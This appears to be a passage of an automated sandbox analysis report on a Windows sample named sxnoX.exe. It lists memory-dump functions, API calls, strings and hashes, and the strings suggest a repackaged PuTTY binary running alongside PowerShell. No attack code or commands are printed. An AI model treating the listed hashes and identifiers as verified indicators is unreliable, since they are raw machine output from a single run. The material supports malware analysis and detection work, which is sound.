Source File: 00000003.00000002.922364129.0000000008710000.00000040.00000800.00020000.00000000.sdmp, Offset: 08710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 578a49981c3aa3752086eee6d73f22bb14fa274868facbd8932dde6c2ed2c84d
Instruction ID: 20846ccc03b99a3c87b4d23cef890a68bc7956839543657432c0380f342266eb
Opcode Fuzzy Hash: 578a49981c3aa3752086eee6d73f22bb14fa274868facbd8932dde6c2ed2c84d
Instruction Fuzzy Hash: 05526F31A0061ADBDF15DF65C8507DEBBB2FF89300F508699E549BB150EB30AA86CF50

Uniqueness

Uniqueness Score: -1.00%

Function 08636FE8 Relevance: .6, Instructions: 571COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.921488412.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8630000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85698680be8780ef34eb0636dfc298eae8018a044e97ca20664f9b86286b01df
Instruction ID: 55c5e0dc7c3cd91782972e56350c502a3bcb37c6df299ccd2acd4e51edf3d34d
Opcode Fuzzy Hash: 85698680be8780ef34eb0636dfc298eae8018a044e97ca20664f9b86286b01df
Instruction Fuzzy Hash: 3E1239B0740300DFEB29AB388C51F6E76A2ABC5704F248469E5069F3D1DBB5EC429B85

Uniqueness

Uniqueness Score: -1.00%

Function 0863C080 Relevance: .4, Instructions: 385COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.921488412.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8630000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ad72a3989c2de123b7afbf8d4ca633e3a486572badb05d2cb2f02d05450eeb0
Instruction ID: 018fd545783a9d63bf2ef638b61da67cce982002eb8358dccb2e2d62a09b71b0
Opcode Fuzzy Hash: 8ad72a3989c2de123b7afbf8d4ca633e3a486572badb05d2cb2f02d05450eeb0
Instruction Fuzzy Hash: A6C13C70341300DFDB29A7749851B6E76A3ABC5308F2489BDE5069F3D2DEB6DC429782

Uniqueness

Uniqueness Score: -1.00%

Function 085F6540 Relevance: .4, Instructions: 354COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.921177147.00000000085F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_85f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfd3b2fef94e203a7a49e3c172cb507b0efd017d979db25845236210bd69069f
Instruction ID: 8abdcdf54dfc7ba3ab8a592ad6fe817df8a2ce8155eb6302804250c91fbd8d2c
Opcode Fuzzy Hash: bfd3b2fef94e203a7a49e3c172cb507b0efd017d979db25845236210bd69069f
Instruction Fuzzy Hash: 97B14A70740300DFDB19AB748852B6E76A3ABC5348F288879E5069F3D6DEB6DC429781

Uniqueness

Uniqueness Score: -1.00%

Function 085FE6E8 Relevance: .4, Instructions: 350COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.921177147.00000000085F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_85f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cebdd05fc708d2f07162e3bd21ece420164cec3a3cf0fd8943bd9190f5b69e91
Instruction ID: 1ade1b1da8b96e110648aab19551468e2b1f1698e5afb13dea74ea1b0c48dfb9
Opcode Fuzzy Hash: cebdd05fc708d2f07162e3bd21ece420164cec3a3cf0fd8943bd9190f5b69e91
Instruction Fuzzy Hash: DAC14F70385340AFE7156731EC57F2A3B929BC5B04F249968F6019F3DACDB2AC429794

Uniqueness

Uniqueness Score: -1.00%

Function 085FE6D8 Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.921177147.00000000085F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_85f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cb71ec78898f10fa0b026fbe0ec3df530937027f0523f4e417d82058c3af225
Instruction ID: c81ce35a41624df90de7d76b520fe3bb5026ead56a370464c0e8a1150ea4da7b
Opcode Fuzzy Hash: 1cb71ec78898f10fa0b026fbe0ec3df530937027f0523f4e417d82058c3af225
Instruction Fuzzy Hash: 82C15070385340AFE7156731EC57F2A3BA29BC5B04F2499A8F6019F3DACDB26C429794

Uniqueness

Uniqueness Score: -1.00%

Function 08718A60 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.922364129.0000000008710000.00000040.00000800.00020000.00000000.sdmp, Offset: 08710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06656ba16627279644e64d8af576ca19417f6e65c6180097d10d81ff7bcd9a0b
Instruction ID: a8437513f7905e065389fe96ae0a8c4068d347c08a2e59ed20f8c90f7805694d
Opcode Fuzzy Hash: 06656ba16627279644e64d8af576ca19417f6e65c6180097d10d81ff7bcd9a0b
Instruction Fuzzy Hash: 5FB13B35E05205CFCB15CF68D484A9DFBB2FF89315F19C1AAD809AB356C731A842CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0866B608 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.921771438.0000000008660000.00000040.00000800.00020000.00000000.sdmp, Offset: 08660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8660000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 530404c4098bbdf6158626cc55e4098eefd07b5540ad9d1051aad3a9c3539cb1
Instruction ID: e727f9676d2879e77770f6af8f766046596804ff1c1ee820a314bd8c9c76a5d1
Opcode Fuzzy Hash: 530404c4098bbdf6158626cc55e4098eefd07b5540ad9d1051aad3a9c3539cb1
Instruction Fuzzy Hash: 2DA14C35E01245DFDB18DFA5E484A9DB7B1BF49331F168259E821EB3A1DB30E942CB80

Uniqueness

Uniqueness Score: -1.00%

Function 08718E68 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.922364129.0000000008710000.00000040.00000800.00020000.00000000.sdmp, Offset: 08710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b54b62657995823b0cd5e16cad0f4dd99d9890ea20a4c710722a96cc52a3740
Instruction ID: f2f47b6c6aa30cb601d88faaab427cfbff91a65b3b982c8a2fcbab84cd3ad647
Opcode Fuzzy Hash: 4b54b62657995823b0cd5e16cad0f4dd99d9890ea20a4c710722a96cc52a3740
Instruction Fuzzy Hash: BA31D536A057424FEB149B2DE444659FB95BF86332F29C27FD4288B5BAC7319808C762

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: sxnoX.exePID: 6780, Parent PID: 6620COMMON

Execution Graph

Execution Coverage:	0.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	11.9%
Total number of Nodes:	385
Total number of Limit Nodes:	25

Executed Functions

Function 00164740 Relevance: 47.4, APIs: 12, Strings: 15, Instructions: 109
libraryloaderregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 0016474D

Part of subcall function 0019BAA0: LoadLibraryA.KERNELBASE(00000000,00000000,?,001A9C90,kernel32.dll), ref: 0019BABF

GetProcAddress.KERNEL32(00000000,FlashWindowEx), ref: 0016479A
GetProcAddress.KERNEL32(00000000,ToUnicodeEx), ref: 001647A7
GetProcAddress.KERNEL32(00000000,PlaySoundA), ref: 001647C6
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 001647E5
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 001647F2
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 001647FF
GetProcAddress.KERNEL32(00000000,GetDpiForMonitor), ref: 00164828
GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 00164847
GetProcAddress.KERNEL32(00000000,AdjustWindowRectExForDpi), ref: 00164854
CoInitialize.OLE32(00000000), ref: 00164875
MessageBoxA.USER32(00000000,Failed to initialize COM subsystem,00000000,00000030), ref: 0016489F

Strings

AdjustWindowRectExForDpi, xrefs: 0016484E
winmm.dll, xrefs: 0016476C
PlaySoundA, xrefs: 001647C0
FlashWindowEx, xrefs: 00164794
ToUnicodeEx, xrefs: 001647A1
#k, xrefs: 00164758
Failed to initialize COM subsystem, xrefs: 00164898
GetMonitorInfoA, xrefs: 001647DF
user32.dll, xrefs: 0016475D
MonitorFromPoint, xrefs: 001647EC
shcore.dll, xrefs: 0016477B
GetSystemMetricsForDpi, xrefs: 00164841
%s Fatal Error, xrefs: 00164886
GetDpiForMonitor, xrefs: 00164822
MonitorFromWindow, xrefs: 001647F9

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: AddressProc$ClipboardFormatInitializeLibraryLoadMessageRegister
String ID: %s Fatal Error$AdjustWindowRectExForDpi$Failed to initialize COM subsystem$FlashWindowEx$GetDpiForMonitor$GetMonitorInfoA$GetSystemMetricsForDpi$MonitorFromPoint$MonitorFromWindow$PlaySoundA$ToUnicodeEx$shcore.dll$user32.dll$winmm.dll$#k
API String ID: 4030309821-2996361279
Opcode ID: d54f1eb3b7e154bdfb6ab7a6f0093a04fb0f9a48e07773fe41c56baf478237ac
Instruction ID: e9ed85f6a7b7a40df22f1c1292b377782dd32e2266c63b76ab4336f18a13ec33
Opcode Fuzzy Hash: d54f1eb3b7e154bdfb6ab7a6f0093a04fb0f9a48e07773fe41c56baf478237ac
Instruction Fuzzy Hash: 58316DB2E657105BD725ABB07C4BE7E37A4AF16B01B090025F90397291EBB0D930C79A

Uniqueness

Uniqueness Score: -1.00%

Function 001C7050 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 94
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(00000000,GetUserNameExA), ref: 001C709E
___from_strstr_to_strchr.LIBCMT ref: 001C70EE
GetUserNameA.ADVAPI32(00000000), ref: 001C7114
GetUserNameA.ADVAPI32(00000000), ref: 001C7140

Strings

sspicli.dll, xrefs: 001C7087
Logical name of remote host (e.g. for SSH key lookup):, xrefs: 001C7050
GetUserNameExA, xrefs: 001C7098
secur32.dll, xrefs: 001C7078

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: NameUser$AddressProc___from_strstr_to_strchr
String ID: GetUserNameExA$Logical name of remote host (e.g. for SSH key lookup):$secur32.dll$sspicli.dll
API String ID: 1511097851-421106942
Opcode ID: a093d58fb59f82546e6cc58300459cc5403bd35ae21861d56b5a38ed05a8cb5b
Instruction ID: ce092fe54308eae750aa9f3100d06b7b98eb3743eb60e9481292436d4cab95e8
Opcode Fuzzy Hash: a093d58fb59f82546e6cc58300459cc5403bd35ae21861d56b5a38ed05a8cb5b
Instruction Fuzzy Hash: CF21D870B4830067EB256B25BC0BF2B36959B62B41F09002CF8469B2C1EBE5D950CBA7

Uniqueness

Uniqueness Score: -1.00%

Function 00194DA0 Relevance: 138.6, APIs: 40, Strings: 39, Instructions: 372
libraryloadernetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0019BAA0: LoadLibraryA.KERNELBASE(00000000,00000000,?,001A9C90,kernel32.dll), ref: 0019BABF

GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00194DDB
GetProcAddress.KERNEL32(770C0000,getaddrinfo), ref: 00194DF8
GetProcAddress.KERNEL32(770C0000,freeaddrinfo), ref: 00194E13
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00194E3D
GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00194E57
GetProcAddress.KERNEL32(00000000,getnameinfo), ref: 00194E72
GetProcAddress.KERNEL32(770C0000,WSAAddressToStringA), ref: 00194EA4
GetProcAddress.KERNEL32(770C0000,WSAAsyncSelect), ref: 00194EC6
GetProcAddress.KERNEL32(770C0000,WSAEventSelect), ref: 00194EE5
GetProcAddress.KERNEL32(770C0000,select), ref: 00194F04
GetProcAddress.KERNEL32(770C0000,WSAGetLastError), ref: 00194F23
GetProcAddress.KERNEL32(770C0000,WSAEnumNetworkEvents), ref: 00194F42
GetProcAddress.KERNEL32(770C0000,WSAStartup), ref: 00194F61
GetProcAddress.KERNEL32(770C0000,WSACleanup), ref: 00194F80
GetProcAddress.KERNEL32(770C0000,closesocket), ref: 00194F9F
GetProcAddress.KERNEL32(770C0000,ntohl), ref: 00194FBE
GetProcAddress.KERNEL32(770C0000,htonl), ref: 00194FDD
GetProcAddress.KERNEL32(770C0000,htons), ref: 00194FFC
GetProcAddress.KERNEL32(770C0000,ntohs), ref: 0019501B
GetProcAddress.KERNEL32(770C0000,gethostname), ref: 0019503A
GetProcAddress.KERNEL32(770C0000,gethostbyname), ref: 00195059
GetProcAddress.KERNEL32(770C0000,getservbyname), ref: 00195078
GetProcAddress.KERNEL32(770C0000,inet_addr), ref: 00195097
GetProcAddress.KERNEL32(770C0000,inet_ntoa), ref: 001950B6
GetProcAddress.KERNEL32(770C0000,inet_ntop), ref: 001950D5
GetProcAddress.KERNEL32(770C0000,connect), ref: 001950F4
GetProcAddress.KERNEL32(770C0000,bind), ref: 00195113
GetProcAddress.KERNEL32(770C0000,setsockopt), ref: 00195132
GetProcAddress.KERNEL32(770C0000,socket), ref: 00195151
GetProcAddress.KERNEL32(770C0000,listen), ref: 00195170
GetProcAddress.KERNEL32(770C0000,send), ref: 0019518F
GetProcAddress.KERNEL32(770C0000,shutdown), ref: 001951AE
GetProcAddress.KERNEL32(770C0000,ioctlsocket), ref: 001951CD
GetProcAddress.KERNEL32(770C0000,accept), ref: 001951EC
GetProcAddress.KERNEL32(770C0000,getpeername), ref: 0019520B
GetProcAddress.KERNEL32(770C0000,recv), ref: 0019522A
GetProcAddress.KERNEL32(770C0000,WSAIoctl), ref: 00195249
WSAStartup.WS2_32(00000202,00262C54), ref: 00195387
WSAStartup.WS2_32(00000002,00262C54), ref: 001953A5
WSAStartup.WS2_32(00000101,00262C54), ref: 001953C6

Strings

getaddrinfo, xrefs: 00194DD5, 00194DF2, 00194E37
WSAIoctl, xrefs: 00195243
recv, xrefs: 00195224
ntohl, xrefs: 00194FB8
connect, xrefs: 001950EE
WSACleanup, xrefs: 00194F7A
WSAAddressToStringA, xrefs: 00194E9E
WSAStartup, xrefs: 00194F5B
gethostname, xrefs: 00195034
WSAEnumNetworkEvents, xrefs: 00194F3C
wsock32.dll, xrefs: 00194DBB
socket, xrefs: 0019514B
wship6.dll, xrefs: 00194E21
inet_ntop, xrefs: 001950CF
closesocket, xrefs: 00194F99
getnameinfo, xrefs: 00194E6C
select, xrefs: 00194EFE
inet_ntoa, xrefs: 001950B0
freeaddrinfo, xrefs: 00194E0D, 00194E51
shutdown, xrefs: 001951A8
Unable to load any WinSock library, xrefs: 001953F0
ioctlsocket, xrefs: 001951C7
WSAAsyncSelect, xrefs: 00194EC0
setsockopt, xrefs: 0019512C
send, xrefs: 00195189
WSAEventSelect, xrefs: 00194EDF
getpeername, xrefs: 00195205
listen, xrefs: 0019516A
gethostbyname, xrefs: 00195053
htonl, xrefs: 00194FD7
ntohs, xrefs: 00195015
ws2_32.dll, xrefs: 00194DA0
WSAGetLastError, xrefs: 00194F1D
htons, xrefs: 00194FF6
bind, xrefs: 0019510D
getservbyname, xrefs: 00195072
Unable to initialise WinSock, xrefs: 001953FA
inet_addr, xrefs: 00195091
accept, xrefs: 001951E6

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: AddressProc$Startup$LibraryLoad
String ID: Unable to initialise WinSock$Unable to load any WinSock library$WSAAddressToStringA$WSAAsyncSelect$WSACleanup$WSAEnumNetworkEvents$WSAEventSelect$WSAGetLastError$WSAIoctl$WSAStartup$accept$bind$closesocket$connect$freeaddrinfo$getaddrinfo$gethostbyname$gethostname$getnameinfo$getpeername$getservbyname$htonl$htons$inet_addr$inet_ntoa$inet_ntop$ioctlsocket$listen$ntohl$ntohs$recv$select$send$setsockopt$shutdown$socket$ws2_32.dll$wship6.dll$wsock32.dll
API String ID: 1450042416-3487058210
Opcode ID: 990003f8f8c4840408b861e4ff6470fb50f612011e49dcd827d2ea98700fc650
Instruction ID: 760a1ce0d1193e14ddd55267494e7f4cdd7902084fc607d1dba654aac92d324c
Opcode Fuzzy Hash: 990003f8f8c4840408b861e4ff6470fb50f612011e49dcd827d2ea98700fc650
Instruction Fuzzy Hash: 12E10BB4611F02DBDB29CF25FD6DB2A3BA5FB04346F11851EE802A26E0DBF5C4588B54

Uniqueness

Uniqueness Score: -1.00%

Function 0017D920 Relevance: 65.4, APIs: 28, Strings: 9, Instructions: 605
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadIconA.USER32(000000C9), ref: 0017DA18
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0017DA34
MapDialogRect.USER32(?,00000003), ref: 0017DA6B
CreateWindowExA.USER32(00000000,STATIC,Cate&gory:,50000000,00000003,00000003,00000062,?,?,000003EF,00000000), ref: 0017DAAE
SendMessageA.USER32(?,00000031,00000000,00000000), ref: 0017DAC3
SendMessageA.USER32(00000000,00000030,00000000,00000001), ref: 0017DACB
MapDialogRect.USER32(?,00000003), ref: 0017DAF5
CreateWindowExA.USER32(00000200,SysTreeView32,002514DC,50010037,00000003,0000000D,00000062,?,?,000003F0,00000000), ref: 0017DB42
SendMessageA.USER32(?,00000031,00000000,00000000), ref: 0017DB51
SendMessageA.USER32(00000000,00000030,00000000,00000001), ref: 0017DB59
_strrchr.LIBCMT ref: 0017DC5E
_strlen.LIBCMT ref: 0017DC96
SendMessageA.USER32(?,00001100,00000000,?), ref: 0017DCC2
SendMessageA.USER32(?,00001102,-00000001,?), ref: 0017DCE6
SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0017DD39
SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0017DD46
SendMessageA.USER32(?,0000110C,00000000,00000005), ref: 0017DD72
GetDlgItem.USER32(?,?), ref: 0017DE25
DestroyWindow.USER32(00000000), ref: 0017DE2C
KillTimer.USER32(?,000004CE), ref: 0017DE4E
MessageBoxA.USER32(?,00000000,Demo screenshot failure,00000010), ref: 0017DE72
SendMessageA.USER32(?,0000110B,00000009,00000000), ref: 0017DEC6
SetTimer.USER32(?,000004CE,000003E8,00000000), ref: 0017DFAD

Part of subcall function 0017F310: SetWindowTextA.USER32(?,?), ref: 0017F31F
Part of subcall function 0017F310: GetWindowLongA.USER32(?,000000EC), ref: 0017F331
Part of subcall function 0017F310: SetWindowLongA.USER32(?,000000EC,00000000), ref: 0017F340

Part of subcall function 0017F870: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 0017F89B
Part of subcall function 0017F870: GetClientRect.USER32(?,?), ref: 0017F8AD
Part of subcall function 0017F870: MapDialogRect.USER32(?), ref: 0017F8D6

SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0017E0CE
InvalidateRect.USER32(?,00000000,00000001), ref: 0017E0D9
SetFocus.USER32(?), ref: 0017E0E8

Strings

Cate&gory:, xrefs: 0017DAA2
j == ctrl_path_elements(s->pathname) - 1, xrefs: 0017DC4C
STATIC, xrefs: 0017DAA7
Demo screenshot failure, xrefs: 0017DE6B
@, xrefs: 0017DD54
SysTreeView32, xrefs: 0017DB38
b, xrefs: 0017DAD5
firstpath, xrefs: 0017DEF7
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/dialog.c, xrefs: 0017DC47, 0017DEF2

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: Message$Send$Window$Rect$Dialog$CreateLongTimer$ClientDestroyFocusIconInvalidateItemKillLoadText_strlen_strrchr
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/dialog.c$@$Cate&gory:$Demo screenshot failure$STATIC$SysTreeView32$b$firstpath$j == ctrl_path_elements(s->pathname) - 1
API String ID: 3050031257-3434313354
Opcode ID: 58c3fddc316a53ad135def875b444ca4495a719ce095004c1e2bb75eb02f9431
Instruction ID: 7b1a6289a1f6b70e424d8dfcf96f13c531aefe6c5d329f67e44b708c0a9a0c2a
Opcode Fuzzy Hash: 58c3fddc316a53ad135def875b444ca4495a719ce095004c1e2bb75eb02f9431
Instruction Fuzzy Hash: FC12F571604304AFE7219F64EC86F6B77F5BF98704F048428FA49AB2E1D7B1A914CB52

Uniqueness

Uniqueness Score: -1.00%

Function 001A8240 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 88
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadCursorA.USER32(00000000,00007F00), ref: 001A8299
RegisterClassA.USER32(00002808), ref: 001A82BC
CreateDialogParamA.USER32(?,?,?,001A8390,00000000), ref: 001A82FB
SetWindowLongA.USER32(00000000,0000001E,00000000), ref: 001A8307
KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 001A833E
IsDialogMessageA.USER32(00000000,?,?,00000000,00000000,00000000), ref: 001A834D
DispatchMessageA.USER32 ref: 001A8354
PostQuitMessage.USER32(?), ref: 001A8362
DestroyWindow.USER32(00000000,?,00000000,00000000,00000000), ref: 001A8369

Strings

", xrefs: 001A827E

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: Message$DialogWindow$CallbackClassCreateCursorDestroyDispatchDispatcherLoadLongParamPostQuitRegisterUser
String ID: "
API String ID: 1405747859-123907689
Opcode ID: e2286162e6ad6fd3a7a4c5f0cf5d1240592fffd85c60f31336aa0ccabeab9e52
Instruction ID: 2010b668d4b3a2344d3fee52e6a76e8aad527ba3a9d2c230c29507ee75dc7251
Opcode Fuzzy Hash: e2286162e6ad6fd3a7a4c5f0cf5d1240592fffd85c60f31336aa0ccabeab9e52
Instruction Fuzzy Hash: 66310574508344AFD7209F24EC49B1BBBF4FF8AB05F00481DFA9497290C7B5A805CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0017F910 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MapDialogRect.USER32(?), ref: 0017F94D
CreateWindowExA.USER32(?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0017F987
SendMessageA.USER32(00000000,00000030,?,00000001), ref: 0017F997
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000116,?,?,BUTTON,50000007,00000000,002514DC,?), ref: 0017F9C3

Strings

LISTBOX, xrefs: 0017F99D

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: Window$CreateDialogMessageRectSend
String ID: LISTBOX
API String ID: 4261271132-1812161947
Opcode ID: 35fd03145fd09f32491158f26d77efc79b10cc2aa38cb1ff7d05a67b17e6ccb3
Instruction ID: b3b1662fdc5f7b73ea42225c77b0b9b1a38b049f7ae4382b512fe083e34c91bf
Opcode Fuzzy Hash: 35fd03145fd09f32491158f26d77efc79b10cc2aa38cb1ff7d05a67b17e6ccb3
Instruction Fuzzy Hash: 4521F572608301BFDB119FA4DC45B5BBBF5FF88744F048819FA9596260C371A861DB92

Uniqueness

Uniqueness Score: -1.00%

Function 0017F310 Relevance: 7.5, APIs: 5, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowTextA.USER32(?,?), ref: 0017F31F
GetWindowLongA.USER32(?,000000EC), ref: 0017F331
SetWindowLongA.USER32(?,000000EC,00000000), ref: 0017F340
GetDlgItem.USER32(?,000003ED), ref: 0017F34E
DestroyWindow.USER32(00000000), ref: 0017F359

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: Window$Long$DestroyItemText
String ID:
API String ID: 4119185043-0
Opcode ID: 2c8901841c253764338e7a3986e2e3e9904fff2c46ceeeb7dfd4207f2f4fc45f
Instruction ID: d915ffccfd30eb0055a29260ae8c2fdfba75e7c72bf9ffad6670c38b5f43dcac
Opcode Fuzzy Hash: 2c8901841c253764338e7a3986e2e3e9904fff2c46ceeeb7dfd4207f2f4fc45f
